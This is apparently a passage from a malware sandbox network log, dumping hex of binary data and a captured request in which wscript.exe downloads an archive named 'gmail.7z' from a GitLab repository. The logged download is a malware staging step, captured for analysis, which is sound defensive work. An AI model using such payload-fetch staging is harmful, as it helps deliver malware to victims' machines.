                                                                                                  2023-06-06 15:28:28 UTC464INData Raw: a4 a6 ff ff cc cc 8d 4d e0 e9 7f f2 fd ff b8 50 34 48 00 e9 90 a6 ff ff cc cc 8d 4d bc e9 56 bf fa ff 8d 4d b0 e9 63 f2 fd ff 8d 4d d4 e9 5b f2 fd ff 8d 4d c8 e9 e5 14 fb ff 8d 4d 8c e9 cc 4b fa ff 8d 4d 08 e9 ab 84 fb ff 8d 4d b0 e9 3b f2 fd ff 8d 4d e4 e9 9b 84 fb ff 8d 4d e8 e9 2b f2 fd ff b8 78 34 48 00 e9 3c a6 ff ff cc cc 8d 8d a0 fe ff ff e9 3b bb fa ff 8d 8d 44 fe ff ff e9 83 c0 fa ff 8d 4d b0 e9 01 f2 fd ff 8d 8d 40 ff ff ff e9 9e e4 fa ff 8d 4d 08 e9 68 4b fa ff 8d 4d 0c e9 4e 84 fb ff 8d 4d d0 e9 de f1 fd ff 8d 8d 94 fe ff ff e9 d3 f1 fd ff ff 75 e4 e8 84 d2 f8 ff 59 c3 8d 4d b0 e9 c1 f1 fd ff b8 e0 34 48 00 e9 d2 a5 ff ff 8b 4d f0 83 c1 04 e9 3a 13 fb ff 8b 4d f0 83 c1 48 e9 a1 f1 fd ff b8 50 35 48 00 e9 b2 a5 ff ff 8d 4d e4 e9 8f f1 fd ff b8
                                                                                                  Data Ascii: MP4HMVMcM[MMKMM;MM+x4H<;DM@MhKMNMuYM4HM:MHP5HM
                                                                                                  2023-06-06 15:28:28 UTC480INData Raw: 61 00 6c 00 50 00 72 00 6f 00 63 00 65 00 73 00 73 00 6f 00 72 00 5c 00 30 00 00 00 00 00 4c 45 00 00 66 3a 00 00 20 3a 20 00 20 53 50 3a 00 00 00 00 57 69 6e 64 6f 77 73 00 20 2d 20 00 7a b6 40 00 7f 3d 44 00 84 b6 40 00 75 b3 40 00 8f b4 40 00 66 b6 40 00 61 3d 44 00 70 b6 40 00 c9 b2 40 00 52 b6 40 00 43 3d 44 00 5c b6 40 00 3f b2 40 00 3e b6 40 00 25 3d 44 00 48 b6 40 00 1f b2 40 00 0a ad 40 00 26 1c 44 00 d9 ad 40 00 68 ae 40 00 5a b1 40 00 6e f3 46 00 6e f3 46 00 6e f3 46 00 6e f3 46 00 6e f3 46 00 6e f3 46 00 6e f3 46 00 6e f3 46 00 6e f3 46 00 6e f3 46 00 6e f3 46 00 6e f3 46 00 6e f3 46 00 6e f3 46 00 6e f3 46 00 6e f3 46 00 6e f3 46 00 37 00 7a 00 74 00 00 00 21 c9 40 00 2b c9 40 00 35 c9 40 00 0d c7 40 00 03 c9 40 00 0d c9 40 00 17 c9 40 00 6d
                                                                                                  Data Ascii: alProcessor\0LEf: : SP:Windows - z@=D@u@@f@a=Dp@@R@C=D\@?@>@%=DH@@@&D@h@Z@nFnFnFnFnFnFnFnFnFnFnFnFnFnFnFnFnF7zt!@+@5@@@@@m
                                                                                                  2023-06-06 15:28:28 UTC496INData Raw: 20 20 2d 61 6e 20 3a 20 64 69 73 61 62 6c 65 20 61 72 63 68 69 76 65 5f 6e 61 6d 65 20 66 69 65 6c 64 0a 20 20 2d 62 62 5b 30 2d 33 5d 20 3a 20 73 65 74 20 6f 75 74 70 75 74 20 6c 6f 67 20 6c 65 76 65 6c 0a 20 20 2d 62 64 20 3a 20 64 69 73 61 62 6c 65 20 70 72 6f 67 72 65 73 73 20 69 6e 64 69 63 61 74 6f 72 0a 20 20 2d 62 73 7b 6f 7c 65 7c 70 7d 7b 30 7c 31 7c 32 7d 20 3a 20 73 65 74 20 6f 75 74 70 75 74 20 73 74 72 65 61 6d 20 66 6f 72 20 6f 75 74 70 75 74 2f 65 72 72 6f 72 2f 70 72 6f 67 72 65 73 73 20 6c 69 6e 65 0a 20 20 2d 62 74 20 3a 20 73 68 6f 77 20 65 78 65 63 75 74 69 6f 6e 20 74 69 6d 65 20 73 74 61 74 69 73 74 69 63 73 0a 20 20 2d 69 5b 72 5b 2d 7c 30 5d 5d 7b 40 6c 69 73 74 66 69 6c 65 7c 21 77 69 6c 64 63 61 72 64 7d 20 3a 20 49 6e 63 6c 75
                                                                                                  Data Ascii: -an : disable archive_name field -bb[0-3] : set output log level -bd : disable progress indicator -bs{o|e|p}{0|1|2} : set output stream for output/error/progress line -bt : show execution time statistics -i[r[-|0]]{@listfile|!wildcard} : Inclu
                                                                                                  2023-06-06 15:28:28 UTC512INData Raw: ff ff a0 37 47 00 00 00 00 00 aa 37 47 00 20 05 93 19 02 00 00 00 28 17 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff bc 37 47 00 00 00 00 00 c6 37 47 00 20 05 93 19 06 00 00 00 58 17 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff d8 37 47 00 00 00 00 00 e0 37 47 00 01 00 00 00 eb 37 47 00 02 00 00 00 f6 37 47 00 03 00 00 00 01 38 47 00 04 00 00 00 0c 38 47 00 20 05 93 19 01 00 00 00 a8 17 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 24 38 47 00 20 05 93 19 02 00 00 00 d0 17 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 38 38 47 00 00 00 00 00 40 38 47 00 20 05 93 19 02 00 00 00 00 18 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                  Data Ascii: 7G7G (H7G7G XH7G7G7G7G8G8G H$8G H88G@8G H
                                                                                                  2023-06-06 15:28:28 UTC528INData Raw: ff ff 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 01 00 00 00 18 57 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 27 4e 43 00 20 05 93 19 01 00 00 00 48 57 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff f8 5f 47 00 20 05 93 19 01 00 00 00 70 57 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 0c 60 47 00 20 05 93 19 01 00 00 00 98 57 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 20 60 47 00 20 05 93 19 02 00 00 00 c0 57 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 34 60 47 00 00 00 00 00 3c 60 47 00 20 05 93 19 01 00 00 00 f0 57 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 50 60 47 00 20
                                                                                                  Data Ascii: WH'NC HWH_G pWH`G WH `G WH4`G<`G WHP`G
                                                                                                  2023-06-06 15:28:28 UTC544INData Raw: 10 03 53 65 74 46 69 6c 65 50 6f 69 6e 74 65 72 00 00 83 00 44 65 76 69 63 65 49 6f 43 6f 6e 74 72 6f 6c 00 ab 02 52 65 61 64 46 69 6c 65 00 00 97 03 57 72 69 74 65 46 69 6c 65 00 05 03 53 65 74 45 6e 64 4f 66 46 69 6c 65 00 00 48 01 47 65 74 44 69 73 6b 46 72 65 65 53 70 61 63 65 57 00 3a 01 47 65 74 43 75 72 72 65 6e 74 50 72 6f 63 65 73 73 00 33 00 43 6f 6d 70 61 72 65 46 69 6c 65 54 69 6d 65 00 bc 00 46 69 6c 65 54 69 6d 65 54 6f 53 79 73 74 65 6d 54 69 6d 65 00 00 bb 00 46 69 6c 65 54 69 6d 65 54 6f 4c 6f 63 61 6c 46 69 6c 65 54 69 6d 65 00 99 01 47 65 74 50 72 6f 63 65 73 73 41 66 66 69 6e 69 74 79 4d 61 73 6b 00 00 bb 01 47 65 74 53 79 73 74 65 6d 49 6e 66 6f 00 fa 01 47 6c 6f 62 61 6c 4d 65 6d 6f 72 79 53 74 61 74 75 73 00 00 32 02 49 73 50 72 6f
                                                                                                  Data Ascii: SetFilePointerDeviceIoControlReadFileWriteFileSetEndOfFileHGetDiskFreeSpaceW:GetCurrentProcess3CompareFileTimeFileTimeToSystemTimeFileTimeToLocalFileTimeGetProcessAffinityMaskGetSystemInfoGlobalMemoryStatus2IsPro
                                                                                                  2023-06-06 15:28:28 UTC560INData Raw: a4 3a ac 3a b4 3a 48 3b 4c 3b 50 3b 54 3b 58 3b 5c 3b 60 3b 64 3b 68 3b 6c 3b 88 3b 8c 3b 90 3b 94 3b 98 3b 9c 3b a0 3b a4 3b a8 3b ac 3b 1c 3c 20 3c 24 3c 28 3c 2c 3c 30 3c 34 3c 38 3c 3c 3c 40 3c 44 3c 48 3c 4c 3c 50 3c 54 3c 58 3c 5c 3c 70 3c 74 3c 78 3c 7c 3c 80 3c 84 3c 88 3c a8 3c b0 3c b8 3c c0 3c c8 3c d0 3c 00 a0 07 00 5c 01 00 00 84 33 88 33 8c 33 90 33 94 33 98 33 9c 33 a0 33 a4 33 a8 33 ac 33 9c 35 a0 35 a4 35 a8 35 ac 35 b0 35 b4 35 b8 35 bc 35 c0 35 c4 35 c8 35 cc 35 d0 35 d4 35 d8 35 dc 35 e0 35 e4 35 e8 35 ec 35 f0 35 f4 35 f8 35 fc 35 00 36 04 36 08 36 0c 36 10 36 14 36 18 36 1c 36 20 36 24 36 28 36 2c 36 30 36 34 36 38 36 3c 36 40 36 44 36 48 36 4c 36 50 36 54 36 58 36 5c 36 60 36 64 36 68 36 6c 36 70 36 74 36 78 36 7c 36 80 36 bc 36 c0
                                                                                                  Data Ascii: :::H;L;P;T;X;\;`;d;h;l;;;;;;;;;;;< <$<(<,<0<4<8<<<@<D<H<L<P<T<X<\<p<t<x<|<<<<<<<<<<\33333333333555555555555555555555555566666666 6$6(6,6064686<6@6D6H6L6P6T6X6\6`6d6h6l6p6t6x6|666


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  1192.168.2.649713172.65.251.78443C:\Windows\System32\wscript.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2023-06-06 15:28:28 UTC571OUTGET /cv4345521/cv/-/raw/main/gmail.7z?inline=false HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Language: en-us
                                                                                                  UA-CPU: AMD64
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                  Host: gitlab.com
                                                                                                  Connection: Keep-Alive
                                                                                                  2023-06-06 15:28:28 UTC571INHTTP/1.1 200 OK
                                                                                                  Date: Tue, 06 Jun 2023 15:28:28 GMT
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Length: 1960608
                                                                                                  Connection: close
                                                                                                  Cache-Control: max-age=60, public, must-revalidate, stale-while-revalidate=60, stale-if-error=300, s-maxage=60
                                                                                                  Content-Disposition: attachment; filename="gmail.7z"; filename*=UTF-8''gmail.7z
                                                                                                  2023-06-06 15:28:28 UTC572INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 61 70 74 63 68 61 2e 6e 65 74 2f 20 68 74 74 70 73 3a 2f 2f 63 6f 6e 74 65 6e 74 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 63 6f 6e 74 65 6e 74 2d 63 6f 6d 70 75 74 65 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 63 6f 6e 74 65 6e 74 2d 63 6c 6f 75 64 62 69 6c 6c 69 6e 67 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 63 6f 6e 74 65 6e 74 2d 63 6c 6f 75 64 72 65 73 6f 75 72 63
                                                                                                  Data Ascii: Content-Security-Policy: base-uri 'self'; child-src https://www.google.com/recaptcha/ https://www.recaptcha.net/ https://content.googleapis.com https://content-compute.googleapis.com https://content-cloudbilling.googleapis.com https://content-cloudresourc
                                                                                                  2023-06-06 15:28:28 UTC574INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 66 67 52 4e 6f 4e 44 79 44 69 65 47 52 63 70 6a 68 58 65 53 47 67 33 41 6d 7a 78 68 63 43 38 30 70 73 61 71 65 4a 68 57 6a 73 59 72 25 32 46 6a 76 33 43 55 34 42 4d 59 38 32 75 34 4b 76 56 35 42 54 61 4b 35 79 32 70 4a 30 58 51 78 6c 4e 4f 72 67 66 4a 6f 4a 59 41 66 44 73 70 61 32 4c 31 44 4e 4c 39 74 58 6d 4d 43 6e 50 4c 67 52 52 61 73 71 37 64 4f 77 56 32 42 4e 6c 57 6b 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20 7b 22 73 75
                                                                                                  Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fgRNoNDyDieGRcpjhXeSGg3AmzxhcC80psaqeJhWjsYr%2Fjv3CU4BMY82u4KvV5BTaK5y2pJ0XQxlNOrgfJoJYAfDspa2L1DNL9tXmMCnPLgRRasq7dOwV2BNlWk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"su
                                                                                                  2023-06-06 15:28:28 UTC575INData Raw: 37 7a bc af 27 1c 00 04 33 73 73 02 40 ea 1d 00 00 00 00 00 40 00 00 00 00 00 00 00 1e 04 ce b5 95 2f 10 97 5c 23 ab 7c db 6f d9 3c c5 6a 0e a7 83 4d d4 c7 4b ce 79 da a8 04 26 d8 16 78 a3 78 9b 9d c1 af 82 b5 7c 56 eb f2 04 c1 f6 36 44 a8 01 d6 6d 40 57 5b ba 0b 8e 91 b4 da da 9e 7e 6e cf fc 9a 8e 11 53 01 f2 48 74 21 99 6d 7c 63 c9 eb 06 33 13 71 bc 63 ae a8 c4 02 16 d0 fc a4 5e a6 00 51 fc c9 11 d9 77 67 36 a6 d4 3b 71 ee 8b 76 6f 15 68 bb 57 93 aa 2f 20 e8 54 b6 28 92 76 09 1d f7 29 eb 47 0c 8b 11 97 4e fe ef 13 04 5e 85 50 be 71 1f a5 d7 45 50 19 5a 27 60 37 32 66 90 c8 4a 02 9d c4 24 8f 2a 91 1b da 77 dc 02 04 b1 a3 1f 05 3d f4 86 2c 0f 1c 0b 49 18 3e 36 6c ec 0e 24 5f b0 19 15 cb 8c f9 e2 aa fe 34 c6 55 e9 64 4f 8c 70 a1 38 33 3d e2 d4 cf 64 a5 4d
                                                                                                  Data Ascii: 7z'3ss@@/\#|o<jMKy&xx|V6Dm@W[~nSHt!m|c3qc^Qwg6;qvohW/ T(v)GN^PqEPZ'`72fJ$*w=,I>6l$_4UdOp83=dM
                                                                                                  2023-06-06 15:28:28 UTC576INData Raw: b5 eb 2b 7e 4f b4 ab 48 1d 55 8b 3f d1 0b 91 03 14 2c 44 f8 d2 28 8c d9 3a 57 36 f8 b1 86 60 a5 91 66 d6 8f 8a ad fd fb e2 07 60 90 9a 39 fc 21 8a 92 3f b0 20 71 f5 8d a4 95 1e cb 24 96 38 b3 65 60 e9 36 8b ce fc 9b 6f 11 1a f0 d2 39 9b df be b0 cc 2c 10 b3 cb c4 bd 81 a4 dc aa 5e 80 d9 ea 42 db ad bc d0 7f b0 7b 40 6c 46 61 1a 89 4e 8b 57 d6 7b 63 cf 6a 72 a9 5d 13 68 1b 19 a9 10 56 ee 1a d1 8c 02 da ca 99 eb a6 da 88 d4 b7 e0 1c 89 44 d3 3a 8c 19 96 4b fb ab 0d 88 e3 dd e4 26 86 07 78 17 cb 46 a2 17 45 a0 0c 99 74 f7 69 26 7a e1 b8 17 02 73 06 ce 66 28 3d 91 08 4b 57 83 71 63 51 c5 c8 6c 50 fb 37 50 9e 1b 4b 2d 6f fb 03 0b 35 d8 da 9e 87 dc 1a 36 81 08 3c 56 ea 83 1a 38 7f d0 e8 19 2b d8 98 b6 84 f9 fe b5 ed 98 a0 d7 ab 84 18 80 c9 f4 b6 f1 eb f2 d3 0c
                                                                                                  Data Ascii: +~OHU?,D(:W6`f`9!? q$8e`6o9,^B{@lFaNW{cjr]hVD:K&xFEti&zsf(=KWqcQlP7PK-o56<V8+
                                                                                                  2023-06-06 15:28:28 UTC577INData Raw: 8a 1e 04 e7 c9 56 7b c8 cd be cb dd ba 1e a8 fa 87 3a 3b 9a d6 c3 fe 7f 38 29 11 dd a5 5d 7b d4 2e fa 2b b0 b0 7e 98 54 a3 d5 ee e2 6d 3a a0 a3 50 8f 5b a1 b1 21 37 56 28 58 58 21 25 2d 4a 25 4a fb bf 51 1d af aa 08 f3 7d 12 16 54 1d 9f 18 bb 28 bd af 0e dc 80 a6 7b ca 9d 1a 2e 74 d0 cd eb 3e 0b df 58 85 08 6c 61 5d 77 45 d8 27 28 91 0e f9 6c 3e 38 dd d0 89 6e 65 b3 31 e6 20 1f c6 29 50 3b ff bd 4c 55 fe d0 02 5f d1 7d 8b 57 e2 3a 49 00 cf 67 94 b1 d5 0e b1 3e a1 3d 79 8c 82 30 c8 f3 5b c7 3d 32 db e3 ba 89 28 d9 6e 97 41 69 92 88 20 3a 95 cb 8e fc 2b 9c 9f 07 eb a1 7e f0 54 0a 8d 55 92 20 f2 47 93 1e 3d 5c f9 3f 43 7c 33 dd b5 92 e4 b5 9b 22 28 64 dd 07 da f0 5a 30 c6 fd 34 5e e7 8b 50 f0 54 31 b1 d3 0f a6 ef 28 1c 58 99 b2 6d 2a ac 52 05 0e 5c ea 84 d0
                                                                                                  Data Ascii: V{:;8)]{.+~Tm:P[!7V(XX!%-J%JQ}T({.t>Xla]wE'(l>8ne1 )P;LU_}W:Ig>=y0[=2(nAi :+~TU G=\?C|3"(dZ04^PT1(Xm*R\
                                                                                                  2023-06-06 15:28:28 UTC579INData Raw: 36 d8 47 05 52 b7 77 26 3f 0d c8 5f a8 0d 38 c0 b4 86 b0 9b f1 f3 3a 27 66 ca dd 28 f2 21 c0 0e 15 98 b6 47 74 4f 7b ba d0 d0 b7 b4 01 d4 03 17 af c3 72 0b 91 61 36 4b d9 06 bb 3c 6c eb 3a 01 28 63 bb c8 79 0f 00 80 f1 b4 9d 36 31 fb 55 b9 ae 52 ee 26 1c b0 66 28 61 b1 b1 af b1 9e 12 71 95 db f9 88 be 28 53 4f 67 2f e3 21 8e b5 89 fc ae 94 b5 7d f3 53 18 c8 69 22 7b 27 1a 55 7c f5 e5 da d8 6f f8 8e 76 ae 29 ae a1 48 88 e5 8c e8 ab b5 83 d5 2e d4 2f 24 af d2 86 99 41 1d 2b be d0 8a 2a 5c 6c 29 d6 d0 44 7f 6b 8c 62 ba 42 7c 58 5b 62 b9 3b c8 fb 66 78 39 1d bc e4 7b 24 1f d7 0d 5b ad bf 44 26 6e 3f dc 19 ee b5 8c 94 99 2b 4e c5 12 06 b2 6f 62 c9 d5 32 55 65 20 60 02 8c 4a ed 5c 7e 59 47 d2 6e 21 28 06 10 bc 82 d1 b4 c9 a2 fd 79 b2 66 47 d0 f5 5d 25 a9 f0 9a
                                                                                                  Data Ascii: 6GRw&?_8:'f(!GtO{ra6K<l:(cy61UR&f(aq(SOg/!}Si"{'U|ov)H./$A+*\l)DkbB|X[b;fx9{$[D&n?+Nob2Ue `J\~YGn!(yfG]%
                                                                                                  2023-06-06 15:28:28 UTC580INData Raw: 18 f3 2c 1b 68 b7 3e c0 fd ec c5 96 bc 75 a4 c3 e7 31 85 da b5 f5 ab 62 f1 34 05 6a 46 d7 78 f0 d2 d7 39 16 33 38 14 8b 0d 38 b7 fe 7c 6d d8 a2 71 fe 2b 6b 01 b9 08 94 7a ec 90 bc cd 73 4c f1 51 77 08 e4 1e 7c d8 52 04 b9 4a a1 5c 8a ff df 3a 56 f8 63 53 64 b7 93 5a 9d 7a 43 8b de 6b 7c a6 b4 49 97 60 5c 4d f7 f4 35 a5 ef 3d 69 9b 3a fe cd 15 fc 7d 75 74 13 3c 1a a7 1b f3 ad e8 72 3e b9 e9 f6 34 93 a8 6b 1f 53 92 d5 a5 30 aa 30 46 2f fc 5a cf 0c 01 c0 b5 04 aa c1 1e ca 6f 16 e4 a9 7c 81 ab 09 30 29 15 59 96 23 8b 7c 73 61 61 af 0e 8a 04 94 06 d6 68 ae 7d e1 44 4d 89 13 e4 12 c4 f7 3c 11 d1 ec 29 f2 e8 dd d2 13 39 cb 16 9f e3 e5 8d 12 d2 fb 96 5f 10 f1 1e d0 56 dc 84 21 34 8d 68 d2 d9 0f 2a e3 7b 3f 37 94 18 10 5a 8f c6 5a 0a 25 42 0b 3a ec 7e bd d6 f2 84
                                                                                                  Data Ascii: ,h>u1b4jFx9388|mq+kzsLQw|RJ\:VcSdZzCk|I`\M5=i:}ut<r>4kS00F/Zo|0)Y#|saah}DM<)9_V!4h*{?7ZZ%B:~
                                                                                                  2023-06-06 15:28:28 UTC581INData Raw: 54 c2 05 b6 85 c6 6f df 5a 7a 83 11 32 7a 69 28 2a 9a e4 98 68 d0 99 96 1a bd 29 a6 31 d0 51 c3 ad b8 b5 d7 6e 4c 1c 41 ab 2a ca 3f c2 ad 34 5c f3 45 d8 dc ad f5 02 cf 81 b1 5b 27 59 9b ce 7c ec 07 8b 61 f2 93 b8 a1 45 93 16 f7 34 37 93 f7 16 11 d6 5e c1 7c a2 84 e2 18 69 56 1e c6 8e 61 74 2d 04 2b 23 cc b8 89 21 18 48 2e 2f 0a a8 d2 1e 4e 90 11 f7 54 c5 31 1d 8d 24 45 64 ce f8 b7 8e 5d 9b 7f 5b dc b2 79 f2 f4 b1 a6 ad ec 7d d3 8d b2 02 5a 8b 5b 51 22 5f f3 84 7a 56 4e 64 31 5d ee 34 ab c8 c1 93 91 58 bb 8d 93 1b 1c 07 35 a4 74 07 77 e3 cf 16 aa 35 88 f8 43 b2 bf f0 6f 79 4b 0e fc ad 3e e8 27 a7 26 bb 5b df 7b 10 1b 8b bc 88 d5 ef 4b fb 6e 97 39 f9 e2 03 b9 d0 55 88 83 53 43 cd c4 7a 6b 70 9e ad a2 71 f7 3d 84 d0 2b cd df dd c0 3c 07 14 87 d1 b5 5d 13 9a
                                                                                                  Data Ascii: ToZz2zi(*h)1QnLA*?4\E['Y|aE47^|iVat-+#!H./NT1$Ed][y}Z[Q"_zVNd1]4X5tw5CoyK>'&[{Kn9USCzkpq=+<]
                                                                                                  2023-06-06 15:28:28 UTC583INData Raw: 3f be 4a 18 e7 7f 3c d4 a5 9f 59 6e fd f9 34 e5 f7 c9 c9 fc 22 29 f5 f1 75 c7 74 41 3c 67 28 18 68 27 9d 20 8f ab 04 96 79 6f 17 f4 1d 8e e7 83 ca 81 ea 89 ed 38 6d 47 78 60 be ab 87 cf 3f 74 53 f0 ae 53 7f c7 fe 64 00 b2 9a 80 e2 dd c0 d3 b0 b0 49 4c 50 d6 25 f5 b7 21 97 53 f9 11 68 7d 63 d5 87 f2 8a 81 19 5a f6 e7 b6 d0 49 89 4f c9 9d 4c e6 d4 8c 7a fe 0c 72 45 7b a7 33 78 55 32 a7 eb 2c 05 7a 26 06 e2 a0 fd dc 04 15 8b 22 54 6b 5f 68 99 3c 08 04 24 8b 69 7c 9e c3 a2 4a 02 5c 71 da 41 26 4e 6c fa 29 f6 8f 34 6a 69 5a 97 00 59 6d ca 76 71 1d b3 41 14 1c c2 de 43 a5 87 b9 9e ee af 2a b1 b3 0d f1 fa ff 46 12 0d 93 1b 28 8c 3e 20 31 42 7f 35 d9 1a 45 b2 7b 18 18 31 5d 57 27 10 13 d7 05 a5 46 2e 5f 2e f3 53 6d 9c c0 e7 63 c7 9d 52 7c be 66 50 32 30 65 7d 70
                                                                                                  Data Ascii: ?J<Yn4")utA<g(h' yo8mGx`?tSSdILP%!Sh}cZIOLzrE{3xU2,z&"Tk_h<$i|J\qA&Nl)4jiZYmvqAC*F(> 1B5E{1]W'F._.SmcR|fP20e}p
                                                                                                  2023-06-06 15:28:28 UTC584INData Raw: 55 26 81 4d b0 50 db a2 8d 36 fd 26 39 56 4b 27 62 d1 95 46 66 1f 8f fc bf dd 02 77 3c ec 1f 4a 9d 8b ae 1f e0 84 1b 97 9f 6b a2 9f e4 a7 ff 6d a8 0c 4c df 5d 12 eb 1b 33 ad 2e b1 a6 24 28 aa c7 b6 3f ad 80 45 32 0b bc ee f9 9b a7 82 c3 21 e7 87 28 e5 b8 a8 c0 20 7c 2a e2 17 2a 70 8a 00 57 4c b0 17 72 c2 8a db af 07 62 56 6b bc ce cb fd cc c0 5f 7a 8e 48 48 cd 89 cc f3 3a 17 25 e6 4d 35 8c c9 80 d3 53 08 39 a1 36 7d ee 60 fc ab 73 53 94 15 54 65 d5 58 15 84 ad 49 ea bc 74 1d 72 b4 3e de 09 3d 7e 5c 79 ff 8d ea 52 ca b0 7e d1 d3 5e f9 53 6f 85 21 56 c1 4d 97 6c 3b 54 1e 8b b4 dd 27 af 43 29 e3 c3 79 ff ee d1 ba 3e fc ce ee 78 2f 4c 8b ec 1f 28 24 b4 be a7 b3 19 af 1d 6a 40 38 86 9a fc 6c c8 46 71 0a 8b 2c 26 6a 20 22 8c cf 3d 18 5b 65 b7 84 3c 11 fd 37 33
                                                                                                  Data Ascii: U&MP6&9VK'bFfw<JkmL]3.$(?E2!( |**pWLrbVk_zHH:%M5S96}`sSTeXItr>=~\yR~^So!VMl;T'C)y>x/L($j@8lFq,&j "=[e<73
                                                                                                  2023-06-06 15:28:28 UTC585INData Raw: 08 dd a0 64 52 a2 e3 46 7b aa f6 cd e3 f4 9d a8 a3 23 41 e5 be c1 37 7a 14 de 5f fc c9 95 35 4b b2 e3 b5 9c 84 87 3b 07 f1 2c 94 c9 5a 00 a7 7b a5 d5 fd 6e 45 e7 37 f6 18 39 1d 0b 91 64 af 28 c5 13 96 9a a4 91 c1 3b fd 5e 3c 2f 4c b7 ce 86 cc 36 b4 71 0f be ad 35 9c 34 e8 1a 1a c4 37 56 13 a1 11 f0 41 98 2b ba 42 bd b1 b8 e1 48 4d 17 45 70 7f 46 da 95 78 67 9d a2 ca c6 63 28 48 36 29 83 e2 f0 ba 03 9c ed 7c f1 36 b4 26 00 6b bd 58 d0 a3 20 9d e9 cd 50 4e 71 0e da 23 f0 0a b0 4d 03 2d bc ac 7c fc 04 0c 77 72 f3 97 a6 11 ba a5 79 39 34 7b ab f2 a0 dc 45 01 f3 ba b9 2b 29 3f 89 e2 e7 61 0c 7d dd 35 72 60 0b 8f 71 81 65 7c e5 bc 39 c0 3d b8 7d 52 60 a3 84 c3 3c 25 07 ae ec d9 78 02 dc 23 52 6a 0d fe 5a dd 9c 3f 24 4c e3 a6 55 c1 be 98 80 59 5b 2c d7 18 10 68
                                                                                                  Data Ascii: dRF{#A7z_5K;,Z{nE79d(;^</L6q547VA+BHMEpFxgc(H6)|6&kX PNq#M-|wry94{E+)?a}5r`qe|9=}R`<%x#RjZ?$LUY[,h
                                                                                                  2023-06-06 15:28:28 UTC587INData Raw: 92 74 9d 76 d5 6d d1 29 09 16 8e 1b df e3 87 66 44 c6 7c f7 7f 43 89 3c c7 be b3 d2 c1 ba 60 3d d7 15 07 64 8a 41 37 bd 32 f6 25 5f 38 f9 71 ab 35 7b d1 f3 8f 2d 97 ff 96 ad df d9 90 97 80 a7 07 8d 2d 6d d2 15 d6 35 5d 26 dd 7f 1d 5f b0 d8 36 81 39 3a 4f a8 19 b3 78 2a 83 d1 68 23 99 f2 14 19 3a 8c 39 05 e7 ba 57 1c 03 8b 25 8c 98 57 8e fc 90 d2 3e e5 f7 f3 21 dd 49 2e f2 45 d2 29 78 8a eb df f7 fb d4 05 06 c4 71 57 ec 4a 3e 05 03 76 91 8d c9 b9 89 ed 74 3e d8 4e 2e e2 71 e8 5c 3e 40 e8 ed dc bc b7 5a ba 6b 6a 73 11 1d ce 49 80 03 8d 4a b0 94 a1 2e 5f 21 7a bc e1 af 8e bc e0 28 fa a3 3c c5 d3 ae 73 77 e7 ea 4f bd 6e 4e 9a e1 1c 03 09 6f d0 07 c1 00 61 e1 a3 0a 7e 85 d5 d6 68 20 3a cc 84 ac 41 64 3e 00 a2 e6 e3 b7 c9 76 43 f1 9f 85 e7 9d 51 d5 5e 31 e3 66
                                                                                                  Data Ascii: tvm)fD|C<`=dA72%_8q5{--m5]&_69:Ox*h#:9W%W>!I.E)xqWJ>vt>N.q\>@ZkjsIJ._!z(<swOnNoa~h :Ad>vCQ^1f
